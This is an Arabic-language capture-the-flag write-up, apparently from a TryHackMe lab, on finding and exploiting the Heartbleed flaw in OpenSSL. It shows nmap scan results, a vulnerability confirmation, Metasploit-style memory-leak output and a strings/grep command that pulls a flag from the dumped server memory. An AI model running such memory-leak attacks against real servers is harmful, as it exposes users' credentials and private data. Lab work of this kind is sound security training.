
كان الهدف من هذا المشروع هو تقييم مضيف بعيد لثغرة Heartbleed (CVE-2014-0160)، والتحقق من وجودها، واستغلالها لاستخراج معلومات قد تكون حساسة من ذاكرة الخادم عبر بروتوكول TLS.
كان الهدف من هذا المشروع هو تقييم مضيف بعيد بحثًا عن ثغرة Heartbleed (CVE-2014-0160)، والتحقق من وجودها، واستغلالها لاستخراج معلومات قد تكون حساسة من ذاكرة الخادم عبر بروتوكول TLS.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4
111/tcp open rpcbind 2-4
443/tcp open ssl/http nginx 1.15.7
| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK
| Not valid before: 2019-02-16T10:41:14
| Not valid after: 2020-02-16T10:41:14
شهادة TLS كانت موقعة ذاتيًا ومنتهية الصلاحية. أثار ذلك شكوكًا بأن إصدار OpenSSL قد يكون قديمًا. المنفذ المستهدف: 443.
| ssl-heartbleed:
| VULNERABLE:
| OpenSSL 1.0.1 is vulnerable to Heartbleed
| State: VULNERABLE
| Risk factor: High
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
تم تأكيد أن الهدف معرض لثغرة Heartbleed.
[+] Heartbeat response with leak, 44883 bytes
[+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin
تم تفريغ الذاكرة بنجاح وتخزينها محليًا للتحليل.
strings openssl.heartble_152689.bin | grep -i "THM{"
النتيجة:
user_name=hacker101&[email protected]&user_message=THM{sSl-Is-BaD}
تم استخراج بيانات سرية، بما في ذلك علم التطبيق (flag)، بنجاح من ذاكرة TLS — مما يؤكد أنه يمكن استغلال الثغرة عمليًا لتسريب معلومات حساسة.
لقد تمكنت بنجاح من تحديد واستغلال CVE-2014-0160 على خادم بعيد. تضمنت العملية:
يشكل وجود Heartbleed في نظام معرض للجمهور خطرًا حرجًا: